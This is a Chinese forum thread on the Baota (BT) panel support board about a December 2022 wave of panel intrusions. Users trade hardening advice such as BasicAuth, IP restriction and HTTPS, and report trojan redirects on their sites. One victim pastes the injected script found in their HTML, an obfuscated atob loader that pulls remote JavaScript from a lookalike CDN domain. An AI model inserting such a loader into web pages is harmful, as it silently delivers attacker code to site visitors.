当前位置:论坛首页 > Linux面板 > 建议

【官方公告】关于外传宝塔面板或Nginx异常的公告

发表在 Linux面板2022-12-9 10:18   [复制链接] 159 92055

发表于 2022-12-13 18:58:02 | 显示全部楼层
本帖最后由 Zxwax 于 2022-12-13 19:04 编辑
tttttttttt 发表于 2022-12-13 16:52
为什么我的输入没有提示木马文件,说白了还是你们自己服务器端口号默认的不改,我服务器里面挂了安全狗,天 ...

小学生就不要参与这种讨论了。。。
https://www.bt.cn/bbs/thread-105281-1-1.html
QQ截图20221213190219.jpg
QQ截图20221213190219.jpg

联系堡塔安全赤井秀一,免费协助您解决问题。QQ:1021266737  发表于 2022-12-14 10:05
使用道具 举报 回复 支持 反对
发表于 2022-12-13 19:27:12 | 显示全部楼层
Zxwax 发表于 2022-12-13 18:58
小学生就不要参与这种讨论了。。。
https://www.bt.cn/bbs/thread-105281-1-1.html

哈哈。个人感觉应该是绕过了鉴权。小学生以为装了360就天下无敌,和他们没必要较真。
使用道具 举报 回复 支持 反对
发表于 2022-12-13 21:04:36 | 显示全部楼层
宝塔用户_vtykot 发表于 2022-12-13 19:27
哈哈。个人感觉应该是绕过了鉴权。小学生以为装了360就天下无敌,和他们没必要较真。 ...

关键是后台端口和密码设置的都非常复杂,说实话我自己都记不住。。。入侵者却轻而易举的登录进去。。。
使用道具 举报 回复 支持 反对
发表于 2022-12-14 10:24:21 | 显示全部楼层
Zxwax 发表于 2022-12-13 21:04
关键是后台端口和密码设置的都非常复杂,说实话我自己都记不住。。。入侵者却轻而易举的登录进去。。。 ...

你好,我看了你发的帖子,是有修改了BT面板的默认端口,不知有没有开启BasicAuth认证?想了解一下修改默认端口再加上开启BasicAuth认证,不知能不能拦截这次的问题。
使用道具 举报 回复 支持 反对
发表于 2022-12-14 12:56:30 | 显示全部楼层
小新 发表于 2022-12-14 10:24
你好,我看了你发的帖子,是有修改了BT面板的默认端口,不知有没有开启BasicAuth认证?想了解一下修改默认 ...

理论上知道账户密码和后台端口也无法登录的验证方式是可以避过本次事故的。。
使用道具 举报 回复 支持 反对
发表于 2022-12-14 16:08:37 | 显示全部楼层
小新 发表于 2022-12-14 10:24
你好,我看了你发的帖子,是有修改了BT面板的默认端口,不知有没有开启BasicAuth认证?想了解一下修改默认 ...

更新宝塔面板到7.9.6,然后修复宝塔面板,修改宝塔面板的账号密码和安全入口,然后BasicAuth认证和ip限制登录、面板https、域名绑定等都可以开一下

系统加固、动态口令认证、https和域名绑定建议一定要弄,另外ip限制有条件也弄
使用道具 举报 回复 支持 反对
发表于 2022-12-14 18:53:56 | 显示全部楼层
我遇到点启动可以,重启也可以,重载也可以,状态一直都是关闭
使用道具 举报 回复 支持 反对
发表于 2022-12-15 00:35:11 | 显示全部楼层
相信宝塔yyds!
使用道具 举报 回复 支持 反对
发表于 2022-12-15 07:41:13 | 显示全部楼层
堡塔安全赤井秀一 发表于 2022-12-14 16:08
更新宝塔面板到7.9.6,然后修复宝塔面板,修改宝塔面板的账号密码和安全入口,然后BasicAuth认证和ip限制 ...

个人建议,不知道正确与否。
域名绑定最重要,https反而不太重要,甚至有可能拉后腿。
我的设置如下:绑定一个未解析的域名,如:123.qq.com,也可以是456.163.com
总之绑定的不是本人名下的域名,当然也没法解析,没法设置https。只是本地host指向。
但胜在安全,如果开启https,就需要用自己的域名,需要解析,别人是有办法知道某个域名解析了哪些子域名的。所以开启https反倒有了隐患。
不知道我理解是否正确。
使用道具 举报 回复 支持 反对
发表于 2022-12-15 09:32:49 | 显示全部楼层
kissfour 发表于 2022-12-15 07:41
个人建议,不知道正确与否。
域名绑定最重要,https反而不太重要,甚至有可能拉后腿。
我的设置如下:绑 ...

https是加密传输的,相对http是更安全;https可以用ip或随便一个域名都可以实现自签证书签发,非常方便,不绑定域名也可以直接用面板https自签ip证书就可以了;
https建议一定要开,域名反而绑不绑随你个人

自签证书如何信任看这个
https://www.bt.cn/bbs/thread-105443-1-1.html
使用道具 举报 回复 支持 反对
发表于 2022-12-15 11:03:51 | 显示全部楼层
堡塔安全赤井秀一 发表于 2022-12-15 09:32
https是加密传输的,相对http是更安全;https可以用ip或随便一个域名都可以实现自签证书签发,非常方便, ...

面板API配置包含什么?今天宝塔没配置什么,今天10-11:00发生两次告警:面板API配置发生改变,请及时确认是否本人操作。
使用道具 举报 回复 支持 反对
发表于 2022-12-15 11:49:58 | 显示全部楼层
宝塔用户_xoslde 发表于 2022-12-15 11:03
面板API配置包含什么?今天宝塔没配置什么,今天10-11:00发生两次告警:面板API配置发生改变,请及时确认 ...

加我微信,发宝塔面板给我检查一下
使用道具 举报 回复 支持 反对
发表于 2022-12-15 13:22:55 | 显示全部楼层
宝塔上所有网站都被挂了相同的木马跳转(服务器上很多不同的cms系统)
使用道具 举报 回复 支持 反对
发表于 2022-12-15 13:39:34 | 显示全部楼层
按照官方的指导,自己手动清理了两个木马,但是访问html文件还是有被挂马的代码,感觉没有清除干净。代码如下:

<script>(function() {var hm = document.createElement("script");hm.src = atob("aHR0cHM6Ly9jZG4uYm9vdHNjZG4ub3JnL2FqYXgvbGlicy9qcXVlcnkvMy42LjEvanF1ZXJ5Lmpz");var s = document.getElementsByTagName("script")[0];s.parentNode.insertBefore(hm, s);})();</script>

有没有人有相同的经历?
使用道具 举报 回复 支持 反对
发表于 2022-12-15 17:35:18 | 显示全部楼层
老衲依旧爱飘柔 发表于 2022-12-9 14:11
(端口、ssh端口、宝塔端口)指定ip
启用防串改,权限644。
再牛掰都进不来

cms有漏洞,就能入侵了
使用道具 举报 回复 支持 反对
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

普通问题处理

论坛响应时间:72小时

问题处理方式:排队(仅解答)

工作时间:白班:9:00 - 18:00

紧急运维服务

响应时间:3分钟

问题处理方式:宝塔专家1对1服务

工作时间:工作日:9:00 - 18:30

宝塔专业团队为您解决服务器疑难问题

立即付费处理

工作时间:09:00至24:00

快速回复 返回顶部 返回列表